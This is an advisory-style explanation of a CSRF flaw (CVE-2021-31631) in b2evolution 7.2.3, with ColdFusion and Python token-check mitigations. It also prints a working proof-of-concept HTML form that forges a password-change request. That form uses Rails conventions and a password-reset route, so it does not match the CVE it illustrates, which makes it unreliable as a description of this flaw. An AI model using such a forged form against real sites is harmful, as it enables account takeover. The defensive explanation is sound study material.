
CVE-2021-31631: CSRF

b2evolution CMS v7.2.3 was discovered to contain a Cross-Site Request Forgery (CSRF) via the User login page. This vulnerability allows attackers to escalate privileges.


There is a Cross-Site Request Forgery (CSRF) vulnerability in b2evolution version 7.2.3. CSRF is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated. It works because web browsers automatically include most ambient credentials with each request, such as session cookies, Basic authentication headers, the client's IP address, and client-side SSL certificates, so a request triggered from an attacker-controlled page reaches the application carrying the victim's credentials.

Token-based mitigation (ColdFusion, synchronizer token pattern): the server issues a random per-session token, embeds it in its own form, and aborts any post whose token does not verify. A form hosted on another origin cannot read that value, so a forged post fails the check.

<!--- The site's own form carries <input type="hidden" name="token" value="#CSRFgenerateToken()#" />;
      CSRFgenerateToken() stores the token in the session and CSRFverifyToken() checks against it --->
<cfif NOT StructIsEmpty(form)>
<!--- Guard the key first so a post with no token field aborts instead of throwing --->
<cfif NOT StructKeyExists(form, "token") OR NOT CSRFverifyToken(form.token)>
<cfabort showerror="Invalid Token" />
</cfif>
<cfoutput><p>Hello, #EncodeForHTML(form.name)#</p></cfoutput>
</cfif>

Proof-of-concept page. A victim who is logged in to the target site and submits this form from the attacker's page sends the password-change request with their own session cookie attached; nothing in the request ties it to the victim's session other than that cookie, which the browser adds on its own. Note that the form targets a password-reset route rather than the login page named in the summary, and that it also submits an old_password value, so as written it only succeeds if the attacker already knows the victim's current password.

<html>
<body>
<!-- Cross-site form: the action is on the victim's site, the page hosting it is not -->
<form action="https://localhost/users/59215b8f0ec7c37a4ca27b00/password_reset" method="POST">
<!-- utf8 marker and _method override follow the Rails form convention;
     the original value was garbled in extraction, Rails uses the check mark -->
<input type="hidden" name="utf8" value="✓" />
<input type="hidden" name="_method" value="patch" />
<input type="hidden" name="old_password" value="phew phew" />
<input type="hidden" name="password" value="qweqji" />
<input type="hidden" name="password_confirmation" value="qweqji" />
<!-- No anti-CSRF token field: the endpoint accepts the post on the strength of the cookie alone -->
<input type="submit" value="Submit request" />
</form>
</body>
</html>
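The checks the ColdFusion snippet relies on, applied to the kind of password-change endpoint the PoC form posts to, as an added example in Python. This is not b2evolution's code and not part of the original advisory; it assumes a hypothetical in-memory session store, a site origin of https://localhost (the host the PoC targets), and a hypothetical handle_password_change handler standing in for the real route. It replays the forged post with and without an Origin header, then a legitimate post carrying the session's token.

```python
import hmac
import secrets
from typing import Dict, Optional, Tuple

# Constructed in-memory session store for this example (hypothetical; a real
# application keeps this in its server-side session backend).
SESSIONS: Dict[str, Dict[str, str]] = {}

# Assumed origin of the vulnerable site; the PoC form above posts to localhost.
SITE_ORIGIN = "https://localhost"


def login(session_id: str, user: str) -> str:
    """Create a session and mint a random per-session token (synchronizer token)."""
    token = secrets.token_hex(32)
    SESSIONS[session_id] = {"user": user, "csrf_token": token}
    return token


def render_hidden_field(session_id: str) -> str:
    """The site's own page embeds the token; a page on another origin cannot read it."""
    return '<input type="hidden" name="token" value="%s">' % SESSIONS[session_id]["csrf_token"]


def verify_token(session_id: str, submitted: Optional[str]) -> bool:
    """Constant-time comparison of the submitted token against the session's token."""
    session = SESSIONS.get(session_id)
    if session is None or not submitted:
        return False
    return hmac.compare_digest(session["csrf_token"], submitted)


def handle_password_change(cookies: Dict[str, str], headers: Dict[str, str],
                           form: Dict[str, str]) -> Tuple[int, str]:
    """Hypothetical state-changing endpoint with the two checks a CSRF target lacks.

    The session cookie is attached by the browser to a cross-site POST exactly as
    it is to a same-site one, so it says nothing about who built the request.
    """
    session_id = cookies.get("session", "")
    if session_id not in SESSIONS:
        return 401, "not logged in"
    # Check 1: browsers add an Origin header to cross-site form POSTs and the
    # attacker's page cannot alter it; reject when present and foreign.
    origin = headers.get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return 403, "cross-site origin rejected"
    # Check 2: synchronizer token bound to this session; also covers a missing Origin.
    if not verify_token(session_id, form.get("token")):
        return 403, "invalid token"
    if form.get("password") != form.get("password_confirmation"):
        return 400, "passwords do not match"
    # A real handler would also verify old_password here, then update the hash.
    return 200, "password changed for " + SESSIONS[session_id]["user"]


def demo() -> Dict[str, Tuple[int, str]]:
    """Replay the PoC's forged POST (with and without Origin), a guessed token, and a legitimate POST."""
    SESSIONS.clear()
    token = login("sid-123", "alice")
    cookies = {"session": "sid-123"}          # attached by the browser in every case below
    forged_body = {"_method": "patch", "old_password": "phew phew",
                   "password": "qweqji", "password_confirmation": "qweqji"}
    return {
        # Attacker's page at https://attacker.example (constructed) submits the hidden form.
        "forged": handle_password_change(cookies, {"Origin": "https://attacker.example"}, forged_body),
        # Same body with Origin stripped (older browser or privacy extension): token check still blocks it.
        "forged_no_origin": handle_password_change(cookies, {}, forged_body),
        # Attacker guesses a token value of the right length: rejected, compared in constant time.
        "forged_guess": handle_password_change(cookies, {}, dict(forged_body, token="0" * 64)),
        # Page served from SITE_ORIGIN carries the real token.
        "legit": handle_password_change(cookies, {"Origin": SITE_ORIGIN}, dict(forged_body, token=token)),
    }
```

Run demo() to see the three forged variants rejected with 403 and the legitimate post accepted. In a deployed application the same two checks are normally complemented by marking the session cookie SameSite=Lax or Strict, so that a top-level cross-site POST does not carry the cookie at all; the old_password field in the PoC is only a defence to the extent the attacker does not already know that value.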
